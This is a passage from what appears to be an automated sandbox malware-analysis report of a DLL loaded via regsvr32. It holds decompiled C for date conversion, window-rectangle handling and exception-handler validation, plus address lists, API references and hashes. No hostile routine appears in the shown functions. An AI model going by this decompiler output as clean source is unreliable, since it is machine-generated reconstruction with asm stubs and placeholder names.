							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x1004ce98;
										if(_v12 == 0) {
											_t159 = 0x1004cecc;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013780(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E100107B6(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1004f744;
						goto L10;
					}
				}
			}









































                                                                        0x10018bf5
                                                                        0x10018bf8
                                                                        0x10018bfd
                                                                        0x10018c02
                                                                        0x10018c04
                                                                        0x10018c07
                                                                        0x10018c0a
                                                                        0x10018c0f
                                                                        0x10018c11
                                                                        0x10018c13
                                                                        0x10018e0d
                                                                        0x00000000
                                                                        0x10018c23
                                                                        0x10018c23
                                                                        0x10018c29
                                                                        0x00000000
                                                                        0x10018c39
                                                                        0x10018c3d
                                                                        0x10018c55
                                                                        0x10018c55
                                                                        0x10018c58
                                                                        0x10018c68
                                                                        0x10018c6b
                                                                        0x10018c71
                                                                        0x10018c7b
                                                                        0x10018c7e
                                                                        0x10018c81
                                                                        0x10018c88
                                                                        0x10018c89
                                                                        0x10018c8e
                                                                        0x10018c9b
                                                                        0x10018c9e
                                                                        0x10018ca2
                                                                        0x10018ca5
                                                                        0x10018caa
                                                                        0x10018cad
                                                                        0x10018cb4
                                                                        0x10018cb8
                                                                        0x10018cc8
                                                                        0x10018cca
                                                                        0x10018ccd
                                                                        0x10018cd1
                                                                        0x10018d21
                                                                        0x10018d22
                                                                        0x10018d27
                                                                        0x10018d36
                                                                        0x10018d3e
                                                                        0x10018d44
                                                                        0x10018d48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018d48
                                                                        0x10018d2e
                                                                        0x10018d2f
                                                                        0x10018d30
                                                                        0x10018d34
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018cd9
                                                                        0x10018cd9
                                                                        0x10018cdc
                                                                        0x10018cdf
                                                                        0x10018ce5
                                                                        0x10018ceb
                                                                        0x10018cec
                                                                        0x10018cf1
                                                                        0x10018d00
                                                                        0x10018d08
                                                                        0x10018d0e
                                                                        0x10018d12
                                                                        0x10018d51
                                                                        0x10018d5a
                                                                        0x10018d65
                                                                        0x10018d68
                                                                        0x10018d75
                                                                        0x10018d77
                                                                        0x10018d7e
                                                                        0x10018d83
                                                                        0x10018d85
                                                                        0x10018d85
                                                                        0x10018d8a
                                                                        0x10018d8f
                                                                        0x10018d93
                                                                        0x10018da2
                                                                        0x10018da2
                                                                        0x10018da3
                                                                        0x10018dab
                                                                        0x10018db7
                                                                        0x10018dc1
                                                                        0x10018dc2
                                                                        0x10018dd1
                                                                        0x10018ddb
                                                                        0x10018dde
                                                                        0x10018dec
                                                                        0x10018dee
                                                                        0x10018df7
                                                                        0x10018dfc
                                                                        0x10018e04
                                                                        0x10018e06
                                                                        0x00000000
                                                                        0x10018d95
                                                                        0x10018d95
                                                                        0x10018d97
                                                                        0x10018d97
                                                                        0x10018d98
                                                                        0x10018d9d
                                                                        0x00000000
                                                                        0x10018d9d
                                                                        0x10018d93
                                                                        0x10018d14
                                                                        0x10018d14
                                                                        0x10018d16
                                                                        0x10018d4a
                                                                        0x10018d4a
                                                                        0x00000000
                                                                        0x10018d4a
                                                                        0x10018cf8
                                                                        0x10018cf9
                                                                        0x10018cfa
                                                                        0x10018cfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018cfe
                                                                        0x10018cd1
                                                                        0x10018c41
                                                                        0x10018c49
                                                                        0x10018c4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018c4e
                                                                        0x00000000
                                                                        0x10018c4e
                                                                        0x10018c29

                                                                        APIs
                                                                          • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                          • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                          • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                          • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                          • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                        • String ID:
                                                                        • API String ID: 223281555-0
                                                                        • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                        • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002D821 Relevance: 7.7, APIs: 5, Instructions: 204windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 59%
                                                                        			E1002D821(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				signed char _t75;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				void* _t95;
				intOrPtr _t125;
				intOrPtr _t133;
				void* _t147;
				void* _t151;
				intOrPtr _t155;
				void* _t158;
				void* _t160;

				_t147 = __edx;
				_t158 = _t160 - 0xb0;
				_t70 =  *0x1004c470; // 0x303bb91f
				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
				_t125 = __ecx;
				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
					}
					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
					 *(_t125 + 0x7c) = _t75;
					if((_t75 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t158 - 0x58);
						E1002095F(_t155);
						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
					}
					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
						_t81 = _t80 & 0xfffffffe;
					} else {
						_t81 = _t80 | 0x00000001;
					}
					E100383D0(_t155, _t81);
					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
					}
					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
					if( *(_t158 + 0xbc) == 0) {
						_t57 = _t125 + 0x94; // 0x94
						_t150 = _t57;
						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
						_t85 =  *0x1004efa4; // 0x2
						_t151 = 0;
						_t87 =  *0x1004efa0; // 0x2
						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
					} else {
						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
						E10028E5A(_t125, _t158 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
						_push( *((intOrPtr*)(_t158 + 0xb8)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t158 - 0x70) = E1002CE2A(_t125);
						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
						_t151 = 0;
					}
					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
						E1000870E(_t155, _t125);
					}
					_t133 =  *((intOrPtr*)(_t155 + 0x88));
					if(_t133 != _t125) {
						if(_t133 != _t151) {
							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
								_t95 = 0;
							} else {
								_t95 = 1;
							}
							_push(_t95);
							_push(0xffffffff);
							goto L27;
						}
					} else {
						_push(_t151);
						_push( *(_t158 - 0x70));
						L27:
						_push(_t155);
						E1002D1B2(_t133);
					}
					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
					}
					E1002D14B(_t125, _t125, _t158, _t155);
					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
			}




















                                                                        0x1002d821
                                                                        0x1002d822
                                                                        0x1002d82f
                                                                        0x1002d836
                                                                        0x1002d83c
                                                                        0x1002d84a
                                                                        0x1002d84c
                                                                        0x1002d85a
                                                                        0x1002d886
                                                                        0x1002d891
                                                                        0x1002d891
                                                                        0x1002d895
                                                                        0x1002d8a2
                                                                        0x1002d8a6
                                                                        0x1002d8a9
                                                                        0x1002d8ab
                                                                        0x1002d8b3
                                                                        0x1002d8b6
                                                                        0x1002d8c2
                                                                        0x1002d8c2
                                                                        0x1002d8d5
                                                                        0x1002d8e0
                                                                        0x1002d8e7
                                                                        0x1002d8e2
                                                                        0x1002d8e2
                                                                        0x1002d8e2
                                                                        0x1002d8ed
                                                                        0x1002d8f8
                                                                        0x1002d8fb
                                                                        0x1002d916
                                                                        0x1002d91b
                                                                        0x1002d91b
                                                                        0x1002d922
                                                                        0x1002d92c
                                                                        0x1002d9b9
                                                                        0x1002d9b9
                                                                        0x1002d9c5
                                                                        0x1002d9d1
                                                                        0x1002d9d6
                                                                        0x1002d9e0
                                                                        0x1002d9e7
                                                                        0x1002d9f2
                                                                        0x1002d932
                                                                        0x1002d93c
                                                                        0x1002d948
                                                                        0x1002d956
                                                                        0x1002d966
                                                                        0x1002d96e
                                                                        0x1002d96f
                                                                        0x1002d975
                                                                        0x1002d97b
                                                                        0x1002d97c
                                                                        0x1002d97d
                                                                        0x1002d980
                                                                        0x1002d98c
                                                                        0x1002d9aa
                                                                        0x1002d9af
                                                                        0x1002d9b5
                                                                        0x1002d9b5
                                                                        0x1002da08
                                                                        0x1002da0d
                                                                        0x1002da0d
                                                                        0x1002da12
                                                                        0x1002da1a
                                                                        0x1002da24
                                                                        0x1002da2c
                                                                        0x1002da3b
                                                                        0x1002da36
                                                                        0x1002da38
                                                                        0x1002da38
                                                                        0x1002da3d
                                                                        0x1002da3e
                                                                        0x00000000
                                                                        0x1002da3e
                                                                        0x1002da1c
                                                                        0x1002da1c
                                                                        0x1002da1d
                                                                        0x1002da40
                                                                        0x1002da40
                                                                        0x1002da41
                                                                        0x1002da41
                                                                        0x1002da49
                                                                        0x1002da4f
                                                                        0x1002da5a
                                                                        0x1002da5a
                                                                        0x1002da62
                                                                        0x1002da6e
                                                                        0x1002da6e
                                                                        0x1002da8a

                                                                        APIs
                                                                        • GetWindowRect.USER32 ref: 1002D84C
                                                                        • EqualRect.USER32 ref: 1002D872
                                                                        • IsWindowVisible.USER32 ref: 1002D900
                                                                        • CopyRect.USER32 ref: 1002D93C
                                                                        • GetParent.USER32(?), ref: 1002D9FA
                                                                          • Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                        • String ID:
                                                                        • API String ID: 545338366-0
                                                                        • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                        • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10014691 Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10014691(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
								_t56 = 0;
								L57:
								return _t56;
							}
							L9:
							__eflags =  *(_t52 + 4);
							if( *(_t52 + 4) != 0) {
								_t13 =  &_a4;
								 *_t13 = _a4 + 1;
								__eflags =  *_t13;
							}
							_t81 = _t81 + 1;
							_t52 = _t52 + 0xc;
							__eflags = _t81 - _t88;
						} while (_t81 <= _t88);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t53 =  *0x1004f590; // 0x0
							_t91 = _t69 & 0xfffff000;
							_t93 = 0;
							__eflags = _t53;
							if(_t53 <= 0) {
								L18:
								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
								__eflags = _t55;
								if(_t55 == 0) {
									L56:
									_t56 = _t55 | 0xffffffff;
									__eflags = _t56;
									goto L57;
								}
								__eflags = _v36.Type - 0x1000000;
								if(_v36.Type != 0x1000000) {
									goto L56;
								}
								__eflags = _v36.Protect & 0x000000cc;
								if((_v36.Protect & 0x000000cc) == 0) {
									L28:
									_t57 = InterlockedExchange(0x1004f5d8, 1);
									__eflags = _t57;
									if(_t57 != 0) {
										goto L5;
									}
									_t75 =  *0x1004f590; // 0x0
									__eflags = _t75;
									_t82 = _t75;
									if(_t75 <= 0) {
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											L40:
											InterlockedExchange(0x1004f5d8, 0);
											goto L5;
										}
										_t70 = 0xf;
										__eflags = _t75 - _t70;
										if(_t75 <= _t70) {
											_t70 = _t75;
										}
										_t83 = 0;
										__eflags = _t70;
										if(_t70 < 0) {
											L38:
											__eflags = _t75 - 0x10;
											if(_t75 < 0x10) {
												_t76 = _t75 + 1;
												__eflags = _t76;
												 *0x1004f590 = _t76;
											}
											goto L40;
										} else {
											do {
												_t60 = 0x1004f598 + _t83 * 4;
												_t83 = _t83 + 1;
												__eflags = _t83 - _t70;
												 *_t60 = _t91;
												_t91 =  *_t60;
											} while (_t83 <= _t70);
											goto L38;
										}
									}
									_t61 = 0x1004f594 + _t75 * 4;
									while(1) {
										__eflags =  *_t61 - _t91;
										if( *_t61 == _t91) {
											goto L33;
										}
										_t82 = _t82 - 1;
										_t61 = _t61 - 4;
										__eflags = _t82;
										if(_t82 > 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
								_t77 = _v36.AllocationBase;
								__eflags =  *_t77 - 0x5a4d;
								if( *_t77 != 0x5a4d) {
									goto L56;
								}
								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
								__eflags =  *_t55 - 0x4550;
								if( *_t55 != 0x4550) {
									goto L56;
								}
								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
								if( *((short*)(_t55 + 0x18)) != 0x10b) {
									goto L56;
								}
								_t71 = _t69 - _t77;
								__eflags =  *((short*)(_t55 + 6));
								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
								if( *((short*)(_t55 + 6)) <= 0) {
									goto L56;
								}
								_t63 =  *((intOrPtr*)(_t79 + 0xc));
								__eflags = _t71 - _t63;
								if(_t71 < _t63) {
									goto L28;
								}
								__eflags = _t71 -  *((intOrPtr*)(_t79 + 8)) + _t63;
								if(_t71 >=  *((intOrPtr*)(_t79 + 8)) + _t63) {
									goto L28;
								}
								__eflags =  *(_t79 + 0x27) & 0x00000080;
								if(( *(_t79 + 0x27) & 0x00000080) != 0) {
									goto L41;
								}
								goto L28;
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 + 1;
								__eflags = _t93 - _t53;
								if(_t93 < _t53) {
									continue;
								}
								goto L18;
							}
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L5;
							}
							_t64 = InterlockedExchange(0x1004f5d8, 1);
							__eflags = _t64;
							if(_t64 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
							if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
								L53:
								_t80 = 0;
								__eflags = _t93;
								if(_t93 < 0) {
									L55:
									InterlockedExchange(0x1004f5d8, 0);
									goto L5;
								} else {
									goto L54;
								}
								do {
									L54:
									_t66 = 0x1004f598 + _t80 * 4;
									_t80 = _t80 + 1;
									__eflags = _t80 - _t93;
									 *_t66 = _t91;
									_t91 =  *_t66;
								} while (_t80 <= _t93);
								goto L55;
							}
							_t67 =  *0x1004f590; // 0x0
							_t43 = _t67 - 1; // -1
							_t93 = _t43;
							__eflags = _t93;
							if(_t93 < 0) {
								L49:
								__eflags = _t67 - 0x10;
								if(_t67 < 0x10) {
									_t67 = _t67 + 1;
									__eflags = _t67;
									 *0x1004f590 = _t67;
								}
								_t46 = _t67 - 1; // 0x0
								_t93 = _t46;
								goto L53;
							} else {
								goto L46;
							}
							while(1) {
								L46:
								__eflags =  *((intOrPtr*)(0x1004f598 + _t93 * 4)) - _t91;
								if( *((intOrPtr*)(0x1004f598 + _t93 * 4)) == _t91) {
									break;
								}
								_t93 = _t93 - 1;
								__eflags = _t93;
								if(_t93 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t93;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L55;
								}
								goto L53;
							}
							goto L49;
						}
						_t68 =  *((intOrPtr*)(_t92 - 8));
						__eflags = _t68 - _v8;
						if(_t68 < _v8) {
							goto L41;
						}
						__eflags = _t68 - _t92;
						if(_t68 >= _t92) {
							goto L41;
						}
						goto L15;
					}
					L5:
					_t56 = 1;
					goto L57;
				} else {
					goto L3;
				}
			}



































                                                                        0x10014699
                                                                        0x1001469c
                                                                        0x100146a2
                                                                        0x100146bf
                                                                        0x00000000
                                                                        0x100146bf
                                                                        0x100146aa
                                                                        0x100146ad
                                                                        0x100146b0
                                                                        0x100146b5
                                                                        0x100146b8
                                                                        0x100146c7
                                                                        0x100146ca
                                                                        0x100146cd
                                                                        0x100146d7
                                                                        0x100146d7
                                                                        0x100146d9
                                                                        0x100146dc
                                                                        0x100146de
                                                                        0x100146de
                                                                        0x100146e0
                                                                        0x100146e3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100146e5
                                                                        0x100146e7
                                                                        0x10014832
                                                                        0x10014832
                                                                        0x100148b5
                                                                        0x00000000
                                                                        0x100148b5
                                                                        0x100146ed
                                                                        0x100146ed
                                                                        0x100146f1
                                                                        0x100146f3
                                                                        0x100146f3
                                                                        0x100146f3
                                                                        0x100146f3
                                                                        0x100146f6
                                                                        0x100146f7
                                                                        0x100146fa
                                                                        0x100146fa
                                                                        0x100146fe
                                                                        0x10014702
                                                                        0x10014718
                                                                        0x10014718
                                                                        0x1001471f
                                                                        0x10014725
                                                                        0x10014727
                                                                        0x10014729
                                                                        0x1001473d
                                                                        0x10014744
                                                                        0x1001474a
                                                                        0x1001474c
                                                                        0x100148b2
                                                                        0x100148b2
                                                                        0x100148b2
                                                                        0x00000000
                                                                        0x100148b2
                                                                        0x10014752
                                                                        0x10014759
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001475f
                                                                        0x10014763
                                                                        0x100147bb
                                                                        0x100147c2
                                                                        0x100147c8
                                                                        0x100147ca
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147d0
                                                                        0x100147d6
                                                                        0x100147d8
                                                                        0x100147da
                                                                        0x100147ef
                                                                        0x100147ef
                                                                        0x100147f1
                                                                        0x10014820
                                                                        0x10014827
                                                                        0x00000000
                                                                        0x10014827
                                                                        0x100147f5
                                                                        0x100147f6
                                                                        0x100147f8
                                                                        0x100147fa
                                                                        0x100147fa
                                                                        0x100147fc
                                                                        0x100147fe
                                                                        0x10014800
                                                                        0x10014814
                                                                        0x10014814
                                                                        0x10014817
                                                                        0x10014819
                                                                        0x10014819
                                                                        0x1001481a
                                                                        0x1001481a
                                                                        0x00000000
                                                                        0x10014802
                                                                        0x10014802
                                                                        0x10014802
                                                                        0x1001480b
                                                                        0x1001480c
                                                                        0x1001480e
                                                                        0x10014810
                                                                        0x10014810
                                                                        0x00000000
                                                                        0x10014802
                                                                        0x10014800
                                                                        0x100147dc
                                                                        0x100147e3
                                                                        0x100147e3
                                                                        0x100147e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147e7
                                                                        0x100147e8
                                                                        0x100147eb
                                                                        0x100147ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147ed
                                                                        0x00000000
                                                                        0x100147e3
                                                                        0x10014765
                                                                        0x10014768
                                                                        0x1001476d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014776
                                                                        0x10014778
                                                                        0x1001477e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014784
                                                                        0x1001478a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10014790
                                                                        0x10014792
                                                                        0x1001479b
                                                                        0x1001479f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147a5
                                                                        0x100147a8
                                                                        0x100147aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147b1
                                                                        0x100147b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100147b5
                                                                        0x100147b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
